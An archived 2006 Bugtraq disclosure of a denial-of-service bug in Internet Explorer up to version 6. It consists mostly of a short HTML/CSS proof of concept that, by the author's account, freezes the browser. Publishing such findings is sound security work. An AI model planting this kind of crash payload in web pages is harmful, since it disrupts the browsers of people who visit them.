lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060713235647.23286.qmail@securityfocus.com>
Date: 13 Jul 2006 23:56:47 -0000
From: jonasschaub@...il.com
To: bugtraq@...urityfocus.com
Subject: IE <= 6 DoS vulnerability


<!--
# Internet Explorer <= 6 DoS vulnerability
#
# tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng)
# all versions are vulnerable
# ie 7 (beta 2 and 3) are not affected
#
# this malicious css code freezes/ dos the internet explorer
# prior version 7 and stops any user interaction
# the absolute size of the div element does not matter but has
# to be higher than the input's one
#
# 07/14/2006 by jonasschaub@...il.com
# http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/
#
-->

<style type="text/css">

input
{
	width:35px;
	float:left;
}

</style>

<div style="width:50px;">
	<span>
		<span style="position:relative;">
			<input />
		</span>
		<input />
		<input />
	</span>
</div>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ